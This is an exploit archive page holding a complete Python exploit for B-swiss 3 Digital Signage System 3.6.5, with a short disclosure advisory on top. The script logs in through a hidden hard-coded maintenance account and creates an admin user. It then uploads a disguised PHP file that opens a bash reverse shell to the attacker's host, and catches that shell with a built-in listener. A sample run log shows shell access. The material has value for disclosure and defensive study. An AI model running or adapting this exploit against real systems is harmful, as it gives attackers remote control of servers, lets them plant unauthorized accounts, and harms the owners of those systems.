what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution

B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution
Posted Sep 21, 2020
Authored by LiquidWorm | Site zeroscience.mk

B-swiss 3 Digital Signage System version 3.6.5 suffers from an authenticated arbitrary PHP code execution vulnerability. The vulnerability is caused due to the improper verification of uploaded files in index.php script thru the rec_poza POST parameter. This can be exploited to execute arbitrary PHP code by uploading a malicious PHP script file that will be stored in the /usr/users directory. Due to an undocumented and hidden maintenance account admin_m which has the highest privileges in the application, an attacker can use these hard-coded credentials to authenticate and use the vulnerable image upload functionality to execute code on the server.

tags | exploit, arbitrary, php, code execution
SHA-256 | 81325cc43145d675e9565f4495143d5688fea28975fe4bdf5d8382c06d0f3b36

B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution

Change Mirror Download
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution
#
#
# Vendor: B-Swiss SARL | b-tween Sarl
# Product web page: https://www.b-swiss.com
# Affected version: 3.6.5
# 3.6.2
# 3.6.1
# 3.6.0
# 3.5.80
# 3.5.40
# 3.5.20
# 3.5.00
# 3.2.00
# 3.1.00
#
# Summary: Intelligent digital signage made easy. To go beyond the
# possibilities offered, b-swiss allows you to create the communication
# solution for your specific needs and your graphic charter. You benefit
# from our experience and know-how in the realization of your digital
# signage project.
#
# Desc: The application suffers from an "authenticated" arbitrary
# PHP code execution. The vulnerability is caused due to the improper
# verification of uploaded files in 'index.php' script thru the 'rec_poza'
# POST parameter. This can be exploited to execute arbitrary PHP code
# by uploading a malicious PHP script file that will be stored in
# '/usr/users' directory. Due to an undocumented and hidden "maintenance"
# account 'admin_m' which has the highest privileges in the application,
# an attacker can use these hard-coded credentials to authenticate and
# use the vulnerable image upload functionality to execute code on the
# server.
#
# ========================================================================================
# lqwrm@metalgear:~/prive$ python3 sign2.py 192.168.10.11 192.168.10.22 7777
# [*] Checking target...
# [*] Good to go!
# [*] Checking for previous attempts...
# [*] All good.
# [*] Getting backdoor session...
# [*] Got master backdoor cookie: 0c1617103c6f50107d09cb94b3eafeb2
# [*] Starting callback listener child thread
# [*] Starting handler on port 7777
# [*] Adding GUI credentials: test:123456
# [*] Executing and deleting stager file
# [*] Connection from 192.168.10.11:40080
# [*] You got shell!
# id ; uname -or
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# 4.15.0-20-generic GNU/Linux
# exit
# *** Connection closed by remote host ***
# [?] Want me to remove the GUI credentials? y
# [*] Removing...
# [*] t00t!
# lqwrm@metalgear:~/prive$
# ========================================================================================
#
# Tested on: Linux 5.3.0-46-generic x86_64
# Linux 4.15.0-20-generic x86_64
# Linux 4.9.78-xxxx-std-ipv6-64
# Linux 4.7.0-040700-generic x86_64
# Linux 4.2.0-27-generic x86_64
# Linux 3.19.0-47-generic x86_64
# Linux 2.6.32-5-amd64 x86_64
# Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
# macOS 10.13.5
# Microsoft Windows 7 Business Edition SP1 i586
# Apache/2.4.29 (Ubuntu)
# Apache/2.4.18 (Ubuntu)
# Apache/2.4.7 (Ubuntu)
# Apache/2.2.22 (Win64)
# Apache/2.4.18 (Ubuntu)
# Apache/2.2.16 (Debian)
# PHP/7.2.24-0ubuntu0.18.04.6
# PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
# PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
# PHP/5.6.31
# PHP/5.6.30-10+deb.sury.org~xenial+2
# PHP/5.5.9-1ubuntu4.17
# PHP/5.5.9-1ubuntu4.14
# PHP/5.3.10
# PHP/5.3.13
# PHP/5.3.3-7+squeeze16
# PHP/5.3.3-7+squeeze17
# MySQL/5.5.49
# MySQL/5.5.47
# MySQL/5.5.40
# MySQL/5.5.30
# MySQL/5.1.66
# MySQL/5.1.49
# MySQL/5.0.77
# MySQL/5.0.12-dev
# MySQL/5.0.11-dev
# MySQL/5.0.8-dev
# phpMyAdmin/3.5.7
# phpMyAdmin/3.4.10.1deb1
# phpMyAdmin/3.4.7
# phpMyAdmin/3.3.7deb7
# WampServer 3.2.0
# Acore Framework 2.0
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2020-5590
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5590.php
#
#
# 13.06.2020
#

from http.cookiejar import DefaultCookiePolicy# #yciloPeikooCtluafeD tropmi rajeikooc.ptth mofr
from http.cookiejar import CookieJar# oOo #raJeikooC tropmi rajeikooc.ptth mofr
from six.moves import input# #-----------------+-----------------# #tupni trompi sevom.xis morf
from time import sleep# | 01 | 04 | #peels trompi emit morf
import urllib.request# | | | | #tseuqer.billru tropmi
import urllib.parse# | | | | #esrap.billru tropmi
import telnetlib# | | | #biltenlet tropmi
import threading# | | | | #gnidaerht tropmi
import requests# | | | | #stseuqer tropmi
import socket# | | o | #tekcos tropmi
import sys,re# | | | #er,sys tropmi
############## #-----------------+-----------------# ##############
############### oOo ###############
################ | ################
#################### Y ####################
############################ _ ############################
###############################################################################################

class Sign:

def __init__(self):
self.username = b"\x61\x64\x6d\x69\x6e\x5f\x6d"
self.altruser = b"\x62\x2d\x73\x77\x69\x73\x73"
self.password = b"\x44\x50\x36\x25\x57\x33\x64"
self.agent = "SignageBot/1.02"
self.fileid = "251"
self.payload = None
self.answer = False
self.params = None
self.rhost = None
self.lhost = None
self.lport = None
self.send = None

def env(self):
if len(sys.argv) != 4:
self.usage()
else:
self.rhost = sys.argv[1]
self.lhost = sys.argv[2]
self.lport = int(sys.argv[3])
if not "http" in self.rhost:
self.rhost = "http://{}".format(self.rhost)

def usage(self):
self.roger()
print("Usage: python3 {} <RHOST[:RPORT]> <LHOST> <LPORT>".format(sys.argv[0]))
print("Example: python3 {} 192.168.10.11:80 192.168.10.22 7777\n".format(sys.argv[0]))
exit(0)

def roger(self):
waddup = """
____________________
/ \\
! B-swiss 3 !
! RCE !
\____________________/
! !
! !
L_ !
/ _)!
/ /__L
____________/ (____)
(____)
____________ (____)
\_(____)
! !
! !
\__/
"""
print(waddup)

def test(self):
print("[*] Checking target...")
try:
r = requests.get(self.rhost)
response = r.text
if not "B-swiss" in response:
print("[!] Not a b-swiss system")
exit(0)
if "B-swiss" in response:
print("[*] Good to go!")
next
else:
exit(-251)
except Exception as e:
print("[!] Ney ney: {msg}".format(msg=e))
exit(-1)

def login(self):
token = ""
cj = CookieJar()
self.params = {"locator" : "visitor.ProcessLogin",
"username" : self.username,
"password" : self.password,
"x" : "0",
"y" : "0"}

damato = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
damato.addheaders.pop()
damato.addheaders.append(("User-Agent", self.agent))

try:
print("[*] Getting backdoor session...")
damato.open(self.rhost + "/index.php", urllib.parse.urlencode(self.params).encode('utf-8'))
for cookie in cj:
token = cookie.value
print("[*] Got master backdoor cookie: "+token)
except urllib.request.URLError as e:
print("[!] Connection error: {}".format(e.reason))

return token

def upload(self):
j = "\r\n"
self.cookies = {"PNU_RAD_LIB" : self.rtoken}
self.headers = {"Cache-Control" : "max-age=0",
"Content-Type" : "multipart/form-data; boundary=----j",
"User-Agent" : self.agent,
"Accept-Encoding" : "gzip, deflate",
"Accept-Language" : "en-US,en;q=0.9",
"Connection" : "close"}

self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/"+self.lhost+"/"+str(self.lport)+" <&1;rm "+self.fileid+".php'\");"

print("[*] Adding GUI credentials: test:123456")
# rec_adminlevel values:
# ----------------------
# 100000 - "b-swiss Maintenance Admin" (Undocumented privilege)
# 7 - "B-swiss admin" <---------------------------------------------------------------------------------------+
# 8 - Other |
# |
self.send = "------j{}Content-Disposition: form-data; ".format(j)# |
self.send += "name=\"locator\"{}Users.Save{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"page\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"sort\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"id\"{}{}{}------j\r\nContent-Disposition: form-data; ".format(j*2,self.fileid,j,j)# |
self.send += "name=\"ischildgrid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"inpopup\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"ongridpage\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"rowid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"preview_screenid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"rec_firstname\"{}TestF{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_lastname\"{}TestL{}------j{}Content-Disposition: form-data; ".format(j*2,j,2)# |
self.send += "name=\"rec_email\"{}test@test.cc{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_username\"{}test{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_password\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_cpassword\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_adminlevel\"{}7{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# <----------+
self.send += "name=\"rec_status\"{}1{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_poza\"; filename=\"Blank.jpg.php\"{}Content-Type: application/octet-stream{}".format(j,j*2)
self.send += self.payload+"{}------j{}Content-Disposition: form-data; ".format(j,j)
self.send += "name=\"rec_poza_face\"{}C:\\fakepath\\Blank.jpg{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_language\"{}french-sw{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_languages[]\"{}2{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_can_change_password\"{}1{}------j--{}".format(j*2,j,j)

requests.post(self.rhost+"/index.php", headers=self.headers, cookies=self.cookies, data=self.send)
print("[*] Executing and deleting stager file")
r = requests.get(self.rhost+"/usr/users/"+self.fileid+".php")
sleep(1)

self.answer = input("[?] Want me to remove the GUI credentials? ").strip()
if self.answer[0] == "y" or self.answer[0] == "Y":
print("[*] Removing...")
requests.get(self.rhost+"/index.php?locator=Users.Delete&id="+self.fileid, headers=self.headers, cookies=self.cookies)
if self.answer[0] == "n" or self.answer[0] == "N":
print("[*] Cool!")
print("[*] t00t!")
exit(-1)

def razmisluju(self):
print("[*] Starting callback listener child thread")
konac = threading.Thread(name="ZSL", target=self.phone)
konac.start()
sleep(1)
self.upload()

def fish(self):
r = requests.get(self.rhost+"/usr/users/", verify=False, allow_redirects=False)
response = r.text
print("[*] Checking for previous attempts...")
if not ".php" in response:
print("[*] All good.")
elif "251.php" in response:
print("[!] Stager file \"{}.php\" still present on the server".format(self.fileid))

def phone(self):
telnetus = telnetlib.Telnet()
print("[*] Starting handler on port {}".format(self.lport))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", self.lport))
while True:
try:
s.settimeout(7)
s.listen(1)
conn, addr = s.accept()
print("[*] Connection from {}:{}".format(addr[0], addr[1]))
telnetus.sock = conn
except socket.timeout as p:
print("[!] No outgoing calls :( ({msg})".format(msg=p))
print("[+] Check your port mappings or increase timeout")
s.close()
exit(0)
break

print("[*] You got shell!")
telnetus.interact()
conn.close()

def main(self):
self.env()
self.test()
self.fish()
self.rtoken = self.login()
self.razmisluju()

if __name__ == '__main__':
Sign().main()
Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    14 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close